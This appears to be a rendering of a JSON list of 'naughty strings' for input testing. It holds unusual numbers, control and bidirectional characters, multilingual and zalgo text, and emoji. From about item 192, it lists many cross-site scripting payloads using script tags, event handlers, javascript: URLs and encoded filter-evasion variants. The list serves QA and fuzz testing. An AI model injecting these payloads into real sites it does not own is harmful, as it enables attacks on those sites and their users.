blns.json 25 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471
  1. [
  2. "undefined",
  3. "undef",
  4. "null",
  5. "NULL",
  6. "(null)",
  7. "nil",
  8. "NIL",
  9. "true",
  10. "false",
  11. "True",
  12. "False",
  13. "TRUE",
  14. "FALSE",
  15. "None",
  16. "hasOwnProperty",
  17. "then",
  18. "\\",
  19. "\\\\",
  20. "0",
  21. "1",
  22. "1.00",
  23. "$1.00",
  24. "1/2",
  25. "1E2",
  26. "1E02",
  27. "1E+02",
  28. "-1",
  29. "-1.00",
  30. "-$1.00",
  31. "-1/2",
  32. "-1E2",
  33. "-1E02",
  34. "-1E+02",
  35. "1/0",
  36. "0/0",
  37. "-2147483648/-1",
  38. "-9223372036854775808/-1",
  39. "-0",
  40. "-0.0",
  41. "+0",
  42. "+0.0",
  43. "0.00",
  44. "0..0",
  45. "0.0.0",
  46. "0,00",
  47. "0,,0",
  48. ",",
  49. "0,0,0",
  50. "0.0/0",
  51. "1.0/0.0",
  52. "0.0/0.0",
  53. "1,0/0,0",
  54. "0,0/0,0",
  55. "--1",
  56. "-",
  57. "-.",
  58. "-,",
  59. "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999",
  60. "NaN",
  61. "Infinity",
  62. "-Infinity",
  63. "INF",
  64. "1#INF",
  65. "-1#IND",
  66. "1#QNAN",
  67. "1#SNAN",
  68. "1#IND",
  69. "0x0",
  70. "0xffffffff",
  71. "0xffffffffffffffff",
  72. "0xabad1dea",
  73. "123456789012345678901234567890123456789",
  74. "1,000.00",
  75. "1 000.00",
  76. "1'000.00",
  77. "1,000,000.00",
  78. "1 000 000.00",
  79. "1'000'000.00",
  80. "1.000,00",
  81. "1 000,00",
  82. "1'000,00",
  83. "1.000.000,00",
  84. "1 000 000,00",
  85. "1'000'000,00",
  86. "01000",
  87. "08",
  88. "09",
  89. "2.2250738585072011e-308",
  90. ",./;'[]\\-=",
  91. "<>?:\"{}|_+",
  92. "!@#$%^&*()`~",
  93. "\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f",
  94. "€‚ƒ„†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ",
  95. "\t\u000b\f …             ​

   ",
  96. "­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿",
  97. "",
  98. "￾",
  99. "Ω≈ç√∫˜µ≤≥÷",
  100. "åß∂ƒ©˙∆˚¬…æ",
  101. "œ∑´®†¥¨ˆøπ“‘",
  102. "¡™£¢∞§¶•ªº–≠",
  103. "¸˛Ç◊ı˜Â¯˘¿",
  104. "ÅÍÎÏ˝ÓÔÒÚÆ☃",
  105. "Œ„´‰ˇÁ¨ˆØ∏”’",
  106. "`⁄€‹›fifl‡°·‚—±",
  107. "⅛⅜⅝⅞",
  108. "ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя",
  109. "٠١٢٣٤٥٦٧٨٩",
  110. "⁰⁴⁵",
  111. "₀₁₂",
  112. "⁰⁴⁵₀₁₂",
  113. "ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็",
  114. "'",
  115. "\"",
  116. "''",
  117. "\"\"",
  118. "'\"'",
  119. "\"''''\"'\"",
  120. "\"'\"'\"''''\"",
  121. "<foo val=“bar” />",
  122. "<foo val=”bar“ />",
  123. "<foo val=`bar' />",
  124. "田中さんにあげて下さい",
  125. "パーティーへ行かないか",
  126. "和製漢語",
  127. "部落格",
  128. "사회과학원 어학연구소",
  129. "찦차를 타고 온 펲시맨과 쑛다리 똠방각하",
  130. "社會科學院語學研究所",
  131. "울란바토르",
  132. "𠜎𠜱𠝹𠱓𠱸𠲖𠳏",
  133. "𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆",
  134. "表ポあA鷗ŒéB逍Üߪąñ丂㐀𠀀",
  135. "Ⱥ",
  136. "Ⱦ",
  137. "ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ",
  138. "(。◕ ∀ ◕。)",
  139. "`ィ(´∀`∩",
  140. "__ロ(,_,*)",
  141. "・( ̄∀ ̄)・:*:",
  142. "゚・✿ヾ╲(。◕‿◕。)╱✿・゚",
  143. ",。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’",
  144. "(╯°□°)╯︵ ┻━┻)",
  145. "(ノಥ益ಥ)ノ ┻━┻",
  146. "┬─┬ノ( º _ ºノ)",
  147. "( ͡° ͜ʖ ͡°)",
  148. "¯\\_(ツ)_/¯",
  149. "😍",
  150. "👩🏽",
  151. "👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️",
  152. "👾 🙇 💁 🙅 🙆 🙋 🙎 🙍",
  153. "🐵 🙈 🙉 🙊",
  154. "❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙",
  155. "✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿",
  156. "👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦",
  157. "🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧",
  158. "0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟",
  159. "🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸",
  160. "🇺🇸🇷🇺🇸🇦🇫🇦🇲",
  161. "🇺🇸🇷🇺🇸🇦",
  162. "123",
  163. "١٢٣",
  164. "ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.",
  165. "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ",
  166. "הָיְתָהtestالصفحات التّحول",
  167. "﷽",
  168. "ﷺ",
  169. "مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، ",
  170. "᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜‪‪‪",
  171. "‪‪᚛                 ᚜‪",
  172. "‪‪test‪",
  173. "‫test‫",
  174. "
test
",
  175. "test⁠test‫",
  176. "⁦test⁧",
  177. "Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣",
  178. "̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰",
  179. "̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟",
  180. "̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕",
  181. "Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮",
  182. "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥",
  183. "00˙Ɩ$-",
  184. "The quick brown fox jumps over the lazy dog",
  185. "𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠",
  186. "𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌",
  187. "𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈",
  188. "𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰",
  189. "𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘",
  190. "𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐",
  191. "⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢",
  192. "<script>alert(123)</script>",
  193. "&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;",
  194. "<img src=x onerror=alert(123) />",
  195. "<svg><script>123<1>alert(123)</script>",
  196. "\"><script>alert(123)</script>",
  197. "'><script>alert(123)</script>",
  198. "><script>alert(123)</script>",
  199. "</script><script>alert(123)</script>",
  200. "< / script >< script >alert(123)< / script >",
  201. " onfocus=JaVaSCript:alert(123) autofocus",
  202. "\" onfocus=JaVaSCript:alert(123) autofocus",
  203. "' onfocus=JaVaSCript:alert(123) autofocus",
  204. "<script>alert(123)</script>",
  205. "<sc<script>ript>alert(123)</sc</script>ript>",
  206. "--><script>alert(123)</script>",
  207. "\";alert(123);t=\"",
  208. "';alert(123);t='",
  209. "JavaSCript:alert(123)",
  210. ";alert(123);",
  211. "src=JaVaSCript:prompt(132)",
  212. "\"><script>alert(123);</script x=\"",
  213. "'><script>alert(123);</script x='",
  214. "><script>alert(123);</script x=",
  215. "\" autofocus onkeyup=\"javascript:alert(123)",
  216. "' autofocus onkeyup='javascript:alert(123)",
  217. "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>",
  218. "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>",
  219. "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>",
  220. "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>",
  221. "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>",
  222. "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>",
  223. "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>",
  224. "'`\"><\\x3Cscript>javascript:alert(1)</script>",
  225. "'`\"><\\x00script>javascript:alert(1)</script>",
  226. "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF",
  227. "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF",
  228. "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF",
  229. "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF",
  230. "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF",
  231. "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF",
  232. "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF",
  233. "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF",
  234. "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF",
  235. "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF",
  236. "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF",
  237. "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF",
  238. "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF",
  239. "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF",
  240. "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF",
  241. "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF",
  242. "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF",
  243. "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF",
  244. "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF",
  245. "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF",
  246. "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF",
  247. "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF",
  248. "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF",
  249. "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF",
  250. "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF",
  251. "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF",
  252. "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF",
  253. "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  254. "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  255. "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  256. "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  257. "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  258. "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  259. "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  260. "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  261. "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  262. "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  263. "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  264. "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  265. "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  266. "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  267. "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  268. "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  269. "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  270. "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  271. "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  272. "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  273. "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  274. "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  275. "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  276. "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  277. "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  278. "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  279. "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  280. "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  281. "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  282. "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  283. "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  284. "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  285. "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  286. "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  287. "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  288. "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  289. "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  290. "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  291. "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  292. "<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  293. "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  294. "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  295. "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  296. "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  297. "<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  298. "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  299. "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  300. "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  301. "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  302. "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  303. "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  304. "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  305. "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  306. "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  307. "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  308. "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  309. "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
  310. "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>",
  311. "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>",
  312. "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>",
  313. "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>",
  314. "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>",
  315. "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>",
  316. "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>",
  317. "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>",
  318. "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>",
  319. "`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>",
  320. "\"`'><script>\\x3Bjavascript:alert(1)</script>",
  321. "\"`'><script>\\x0Djavascript:alert(1)</script>",
  322. "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>",
  323. "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>",
  324. "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>",
  325. "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>",
  326. "\"`'><script>\\x09javascript:alert(1)</script>",
  327. "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>",
  328. "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>",
  329. "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>",
  330. "\"`'><script>\\x00javascript:alert(1)</script>",
  331. "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>",
  332. "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>",
  333. "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>",
  334. "\"`'><script>\\x0Cjavascript:alert(1)</script>",
  335. "\"`'><script>\\x2Bjavascript:alert(1)</script>",
  336. "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>",
  337. "\"`'><script>-javascript:alert(1)</script>",
  338. "\"`'><script>\\x0Ajavascript:alert(1)</script>",
  339. "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>",
  340. "\"`'><script>\\x7Ejavascript:alert(1)</script>",
  341. "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>",
  342. "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>",
  343. "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>",
  344. "\"`'><script>\\xC2\\x85javascript:alert(1)</script>",
  345. "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>",
  346. "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>",
  347. "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>",
  348. "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>",
  349. "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>",
  350. "\"`'><script>\\x21javascript:alert(1)</script>",
  351. "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>",
  352. "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>",
  353. "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>",
  354. "\"`'><script>\\x0Bjavascript:alert(1)</script>",
  355. "\"`'><script>\\x20javascript:alert(1)</script>",
  356. "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>",
  357. "<img \\x00src=x onerror=\"alert(1)\">",
  358. "<img \\x47src=x onerror=\"javascript:alert(1)\">",
  359. "<img \\x11src=x onerror=\"javascript:alert(1)\">",
  360. "<img \\x12src=x onerror=\"javascript:alert(1)\">",
  361. "<img\\x47src=x onerror=\"javascript:alert(1)\">",
  362. "<img\\x10src=x onerror=\"javascript:alert(1)\">",
  363. "<img\\x13src=x onerror=\"javascript:alert(1)\">",
  364. "<img\\x32src=x onerror=\"javascript:alert(1)\">",
  365. "<img\\x11src=x onerror=\"javascript:alert(1)\">",
  366. "<img \\x34src=x onerror=\"javascript:alert(1)\">",
  367. "<img \\x39src=x onerror=\"javascript:alert(1)\">",
  368. "<img \\x00src=x onerror=\"javascript:alert(1)\">",
  369. "<img src\\x09=x onerror=\"javascript:alert(1)\">",
  370. "<img src\\x10=x onerror=\"javascript:alert(1)\">",
  371. "<img src\\x13=x onerror=\"javascript:alert(1)\">",
  372. "<img src\\x32=x onerror=\"javascript:alert(1)\">",
  373. "<img src\\x12=x onerror=\"javascript:alert(1)\">",
  374. "<img src\\x11=x onerror=\"javascript:alert(1)\">",
  375. "<img src\\x00=x onerror=\"javascript:alert(1)\">",
  376. "<img src\\x47=x onerror=\"javascript:alert(1)\">",
  377. "<img src=x\\x09onerror=\"javascript:alert(1)\">",
  378. "<img src=x\\x10onerror=\"javascript:alert(1)\">",
  379. "<img src=x\\x11onerror=\"javascript:alert(1)\">",
  380. "<img src=x\\x12onerror=\"javascript:alert(1)\">",
